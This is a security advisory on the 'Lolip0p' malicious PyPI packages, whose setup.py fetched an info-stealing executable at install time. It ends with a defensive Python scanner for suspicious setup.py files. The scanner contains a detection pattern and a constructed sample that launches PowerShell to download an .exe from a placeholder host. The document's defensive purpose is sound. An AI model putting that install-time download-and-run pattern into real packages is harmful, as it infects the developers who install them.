Malicious 'Lolip0p' PyPI Packages Install Info-Stealing Malware
Cybersecurity companies are warning developers to be extra careful when downloading packages from the Python Package Index (PyPI) after three malicious packages were found to contain code that drops info-stealing malware on users' systems. The packages, all uploaded by the same author named 'Lolip0p' between January 7 and 12, 2023, have been removed from PyPI, but the incident serves as a reminder of the potential dangers of downloading packages from online repositories.
What is the Threat?
A threat actor has uploaded three malicious packages to the PyPI repository, each carrying code that drops info-stealing malware on developers' systems. The packages, discovered by Fortinet, were all uploaded by the same author named 'Lolip0p' between January 7 and 12, 2023. Their names are 'colorslib,' 'httpslib,' and 'libhttps.' All three have been reported and removed from PyPI.
Why is it Noteworthy?
PyPI is the most widely used repository for Python packages that software developers use to source the building blocks of their projects. This means that a malicious package uploaded to PyPI has the potential to infect a large number of developers' systems, making it a particularly noteworthy threat.
What is the Exposure or Risk?
The malicious packages feature complete descriptions, which helps trick developers into believing they're genuine resources. This makes it more likely that a developer will download and use the package, exposing their system to the malware.
The packages share the same malicious 'setup.py' file, which attempts to launch PowerShell to fetch an executable named 'Oxyz.exe' from a suspicious URL; because 'setup.py' runs at install time, simply installing the package is enough to trigger it. This piece of malware steals browser information. The detection rates for all three executables used in this attack are quite low, ranging between 4.5% and 13.5%, allowing the malicious files to evade detection by multiple security agents that may be running on the victim host.
What are the Recommendations?
To ensure the safety and security of their projects, software developers should pay close attention when selecting and downloading packages from PyPI and other online repositories. They should be wary of downloading packages from unknown authors, and should check the package's description and other information before downloading.
Developers should also consider using a reputable security solution that can scan packages for malware before they are downloaded and used. Additionally, developers should ensure that their systems are kept up to date with the latest security patches to minimize the risk of infection.
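As an added example (not code from the advisory or from Fortinet's analysis), the following pre-install check applies the recommendation above to the behaviour described under the exposure section: it parses a package's 'setup.py' with Python's ast module and flags process execution and string literals that point at PowerShell or a remote executable. The sample 'setup.py' is constructed for the example, with a placeholder URL in place of the real one.

```python
# Added example: static pre-install scan of a setup.py for install-time
# process execution and download-style literals (the pattern described above).
import ast
import re

# Process-execution calls that have no business in a package's setup.py.
SHELL_CALLS = {
    "os.system", "os.popen", "subprocess.Popen", "subprocess.run",
    "subprocess.call", "subprocess.check_output",
}
# Literals worth flagging: PowerShell, remote URLs, .exe names, download cmdlets.
SUSPICIOUS_LITERAL = re.compile(
    r"(?i)powershell|https?://|\.exe\b|DownloadFile|Invoke-WebRequest"
)


def _call_name(node):
    """Return a dotted name for a call target, e.g. 'subprocess.Popen'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return ""


def scan_setup_py(source):
    """Return a list of (line, reason) findings for a setup.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SHELL_CALLS:
                findings.append((node.lineno, f"process execution via {name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SUSPICIOUS_LITERAL.search(node.value):
                findings.append((node.lineno, f"suspicious literal {node.value!r}"))
    return findings


# Constructed sample mimicking the described setup.py; the URL is a placeholder.
SAMPLE_SETUP_PY = '''
import subprocess
from setuptools import setup
subprocess.Popen(["powershell", "-c", "<fetch https://PLACEHOLDER.invalid/Oxyz.exe>"])
setup(name="colorslib", version="1.0.0", description="Helpers for coloured terminal output.")
'''

if __name__ == "__main__":
    for line, reason in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py:{line}: {reason}")
```

Run it against the extracted sdist of a package before `pip install` (for example with `pip download --no-deps --no-binary :all:`); a clean 'setup.py' that only calls setup() yields no findings.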